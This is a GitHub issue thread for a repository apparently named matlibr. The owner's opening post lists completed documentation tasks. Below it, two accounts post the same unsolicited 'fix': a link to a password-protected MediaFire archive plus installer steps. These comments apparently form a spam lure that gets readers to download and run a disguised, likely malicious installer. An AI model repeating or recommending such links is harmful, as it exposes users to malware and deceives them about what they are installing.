### ISSUE TITLE
Improve documentation

### ISSUE THREAD

**Issue by debajyotid2** [debajyotid2/matlibr#1]
- [x] Add "how to build and run" instructions
- [x] Add "how to test" instructions
- [x] Add "how to include in a project" instructions
- [x] Add an "example"
- [x] Add a "features" section
- [x] Add a "license" section

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
